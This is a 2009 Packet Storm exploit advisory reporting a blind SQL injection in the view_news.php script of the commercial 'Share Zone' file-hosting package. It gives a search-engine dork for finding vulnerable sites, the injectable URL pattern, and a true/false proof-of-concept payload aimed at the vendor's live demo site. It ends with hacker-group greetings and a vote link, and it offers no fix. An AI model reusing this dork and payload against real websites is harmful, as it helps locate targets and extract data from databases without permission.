Share Zone SQL Injection

2009-09-22T00:00:00
ID PACKETSTORM:81552
Type packetstorm
Reporter OoN_Boy
Modified 2009-09-22T00:00:00

Description

                                        
                                            `[x]========================================================================================================================================[x]  
| AntiSecurity[dot]org |  
[x]========================================================================================================================================[x]  
  
  
  
[x]========================================================================================================================================[x]  
| Title : Share Zone view_news.php?id= blind sql Vulnerabilities |  
| Software : Share Zone |  
| Vendor : http://www.vastal.com/ |  
| Demo : http://www.vastal.com/rapid/ |  
| Price : $200.00 |  
| Date : 23 September 2009 ( Indonesia ) |  
| Author : OoN_Boy |  
| Contact : oon.boy9@gmail.com |  
| Web : http://oonboy.info |  
| Blog : http://oonboy.blogspot.com |  
[x]========================================================================================================================================[x]  
  
  
  
  
[x]========================================================================================================================================[x]  
| Description : Create your own file hosting website with ease. The file hosting and sharing website is a new concept which allows|  
| users to share files for free and send large email attachments as well . Our script has all the features needed to|  
| run a rapidshare clone or a megaupload clone |  
[x]========================================================================================================================================[x]  
  
  
  
[x]========================================================================================================================================[x]  
| dork : inurl:view_news.php?id= "Maintained by Vastal I-Tech & Co." |  
[x]========================================================================================================================================[x]  
  
  
  
[x]========================================================================================================================================[x]  
| Exploit : http://localhost/[path]/view_news.php?id=[sql] |  
[x]========================================================================================================================================[x]  
  
  
  
  
[x]========================================================================================================================================[x]  
| Proof of concept : http://www.vastal.com/rapid/view_news.php?id=1+and+substring(@@version,1,1)=5 True |  
| http://www.vastal.com/rapid/view_news.php?id=1+and+substring(@@version,1,1)=4 False |  
[x]========================================================================================================================================[x]  
  
  
  
  
[x]========================================================================================================================================[x]  
| Greetz : antisecurity.org batamhacker.or.id |  
| h4ntu Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va |  
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere |  
[x]========================================================================================================================================[x]  
  
  
  
  
[x]========================================================================================================================================[x]  
| Note : Please help to vote me in http://8.17.84.100/planyouradventour/profil_team.php?uid_group=1466598338 |  
[x]========================================================================================================================================[x]`